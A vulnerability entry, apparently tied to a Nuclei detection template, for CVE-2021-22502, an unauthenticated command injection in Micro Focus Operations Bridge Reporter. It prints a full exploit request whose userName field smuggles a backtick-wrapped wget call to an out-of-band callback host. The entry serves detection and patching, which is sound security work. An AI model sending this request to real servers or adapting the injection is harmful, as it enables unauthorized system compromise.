| Title | Micro Focus Operations Bridge Reporter - Remote Code Execution |
|---|---|
| Author | pikpikcu |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary commands on the Operations Bridge Reporter server, leading to complete system compromise and access to all monitoring data. |
| Remediation | Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93981 |
| CVE ID | CVE-2021-22502 |
| CWE ID | CWE-78 |
| Tags | cve2021 cve microfocus obr rce kev vkev vuln |
Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
POST /AdminService/urest/v1/LogonResource HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 98
Content-Type: application/json
Accept-Encoding: gzip
{"userName":"something `wget d5jn7uple0o3d20vbqnghwpq47nauhrya.oast.fun`","credential":"whatever"}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-22502.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-22502.pcap
N/AN/A